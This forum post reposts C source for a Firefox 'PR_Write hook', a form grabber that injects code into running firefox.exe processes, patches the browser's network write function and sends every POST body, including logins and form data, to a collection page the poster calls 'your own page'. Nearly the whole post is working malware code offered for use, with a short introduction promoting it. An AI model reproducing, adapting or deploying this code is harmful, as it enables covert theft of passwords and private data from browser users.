Jump to content
Nytro

[C]FireFox PR_Write Hook

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1][C]FireFox PR_Write Hook[/h][h=3] post_offline.pngTheAnomaly

Posted 24 December 2010 - 05:05 PM

[/h]This is FireFox DLL-less PR_Write function hooker, in other words it will send all POST data sent from FireFox to your own page where it can be sorted and stored.

It can be optimized by using other thread or process for sending the captured POST data, but at the moment it doesnt slow FireFox really.

Its tested with version 3.6 or so but should works on latest version too.

#include <stdio.h>

#include <windows.h>

#include <Tlhelp32.h>

#include <wininet.h>

typedef HMODULE (WINAPI *GMH) (LPCTSTR);

typedef FARPROC (WINAPI *GPA) (HMODULE,LPCSTR);

typedef int (WINAPI *VP) (LPVOID,SIZE_T,DWORD,PDWORD);

typedef HINTERNET (WINAPI *IO) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);

typedef HINTERNET (WINAPI *IC)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);

typedef HINTERNET (WINAPI *HOR) (HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);

typedef BOOL (WINAPI *HSR)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);

typedef VOID (WINAPI *Slep)(DWORD);

typedef struct {

GMH GetMH; //GetModuleHandle

GPA GetPA; //GetProcAddress

VP SetVP; //VirtualProtect

Slep Slepx; //Sleep

char ModuleName[36]; //"nspr4.dll"

char Proc[36]; //"PR_Write"

BYTE *PR_Write;

BYTE *nptr;

DWORD *bptr;

DWORD OldProtect;

char blank[3];

char localhost[16];

char post[10];

char visit[16];

char header[64];

HINTERNET OpenHandle;

HINTERNET ConnectHandle;

HINTERNET Handle;

int nLen;

char *pVar;

IO IOx;

IC ICx;

HOR HORx;

HSR HSRx;

} Inject_Data;

void Hook(Inject_Data *pData);

int main() {

Inject_Data Data;

LPVOID Mem,Prm;

HANDLE rThread;

HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

PROCESSENTRY32 ProcessInfo;

ProcessInfo.dwSize = sizeof(PROCESSENTRY32);

LoadLibrary("wininet.dll");

Data.GetMH =(GMH) GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleHandleA");

Data.GetPA = (GPA)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");

Data.IOx = (IO)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetOpenA");

Data.ICx = (IC)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetConnectA");

Data.HORx = (HOR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpOpenRequestA");

Data.HSRx = (HSR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpSendRequestA");

Data.SetVP = (VP)GetProcAddress(GetModuleHandle("kernel32.dll"),"VirtualProtect");

Data.Slepx = (Slep)GetProcAddress(GetModuleHandle("kernel32.dll"),"Sleep");

wsprintf(Data.ModuleName,"nspr4.dll");

wsprintf(Data.Proc,"PR_Write");

wsprintf(Data.localhost,"localhost");

wsprintf(Data.post,"POST");

wsprintf(Data.visit,"/hit.php");

wsprintf(Data.header,"Content-Type:application/x-www-form-urlencoded");

wsprintf(Data.blank,"");

while(Process32Next(handle, &ProcessInfo))

{

if(!strcmp(ProcessInfo.szExeFile, "firefox.exe"))

{

handle = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessInfo.th32ProcessID);

Prm = VirtualAllocEx(handle,NULL,sizeof(Data),MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);

WriteProcessMemory(handle,Prm,&Data,sizeof(Data),NULL);

Mem = VirtualAllocEx(handle,NULL,2000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

WriteProcessMemory(handle,Mem,Hook,2000,NULL);

rThread = CreateRemoteThread(handle,NULL,0,(LPTHREAD_START_ROUTINE)Mem,Prm,0,NULL);

WaitForSingleObject(rThread, INFINITE);

CloseHandle(handle);

}

}

return 0;

}

void Hook(Inject_Data *pData) {

BYTE *temp;

goto start;

Hooked:

__asm{

mov ecx,[esp+0xC]

mov eax,[esp+0x8]

cmp dword ptr[eax],0x54534F50 // POST?

jne prexJMP //its not POST

push ecx

call getDelta4 //Get the delta

getDelta4:

pop ecx

sub ecx,offset getDelta4

lea eax,Data

add eax,ecx

pop ecx

mov eax,[eax]

mov pData,eax

mov eax,[esp+0x8]

mov temp,eax

}

pData->pVar = temp;

__asm{ nop }

__asm{ mov ecx,[esp+0xC] }

__asm{ mov temp,ecx }

__asm{ nop }

pData->nLen = temp;

__asm{ nop }

*pData->pVar = 0x72;

pData->pVar++;

*pData->pVar = 0x3D;

pData->pVar--;

pData->Handle = pData->ICx(pData->OpenHandle,pData->localhost,8080,pData->blank,pData->blank,INTERNET_SERVICE_HTTP,0,0);

pData->ConnectHandle = pData->HORx(pData->Handle,pData->post,pData->visit,NULL,NULL,NULL,INTERNET_FLAG_KEEP_CONNECTION,0);

pData->HSRx(pData->ConnectHandle,pData->header,-1L,pData->pVar,pData->nLen);

*pData->pVar = 0x50;

pData->pVar++;

*pData->pVar = 0x4F;

pData->pVar--;

prexJMP:

__asm{

MOV EAX,DWORD PTR [ESP+4]

MOV ECX,DWORD PTR [EAX] }

xJMP:

__asm{ jmp ExitProcess }

Data:

__asm{ nop

nop

nop

nop

}

start:

pData->PR_Write = (BYTE*) pData->GetPA(pData->GetMH(pData->ModuleName),pData->Proc);

pData->SetVP(pData->PR_Write,6,PAGE_EXECUTE_READWRITE,&pData->OldProtect);

//ptr = (BYTE*) Hooked;

__asm{ push ecx }

__asm{ call getDelta } //Get the delta

__asm{ getDelta: }

__asm{ pop ecx }

__asm{ sub ecx,offset getDelta }

__asm{ push eax }

__asm{ lea eax,Hooked }

__asm{ add eax,ecx }

__asm{ mov temp,eax }

__asm{ pop eax }

__asm{ pop ecx }

pData->nptr = temp;

pData->nptr = pData->nptr - pData->PR_Write;

pData->nptr = pData->nptr - 5;

*pData->PR_Write = 0xE9;

pData->PR_Write++;

pData->bptr = (DWORD*) pData->PR_Write;

*pData->bptr = (DWORD) pData->nptr;

pData->PR_Write = pData->PR_Write + 4;

*pData->PR_Write = 0xCC;

pData->PR_Write++;

__asm{ push ecx }

__asm{ call getDelta1 } //Get the delta

__asm{ getDelta1: }

__asm{ pop ecx }

__asm{ sub ecx,offset getDelta1 }

__asm{ push eax }

__asm{ lea eax,xJMP }

__asm{ add eax,ecx }

__asm{ mov temp,eax }

__asm{ pop eax }

__asm{ pop ecx }

pData->nptr = temp;

pData->PR_Write = pData->PR_Write - pData->nptr;

pData->PR_Write = pData->PR_Write - 5;

pData->nptr++;

pData->OldProtect = 0;

pData->SetVP(pData->nptr,10,PAGE_EXECUTE_READWRITE,&pData->OldProtect);

pData->bptr = (DWORD*) pData->nptr;

*pData->bptr = (DWORD) pData->PR_Write;

temp = (BYTE *) pData;

__asm{ push ecx }

__asm{ call getDelta2 } //Get the delta

__asm{ getDelta2: }

__asm{ pop ecx }

__asm{ sub ecx,offset getDelta2 }

__asm{ push eax }

__asm{ push ebx }

__asm{ lea eax,Data }

__asm{ add eax,ecx }

__asm{ mov ebx,temp }

__asm{ mov dword ptr[eax],ebx }

__asm{ pop ebx }

__asm{ pop eax }

__asm{ pop ecx }

/*start the connection */

pData->OpenHandle = pData->IOx(pData->localhost,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);

for(;;) { pData->Slepx(1000); }

}

Sursa: [C]FireFox PR_Write Hook - Source Codes - rohitab.com - Forums

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...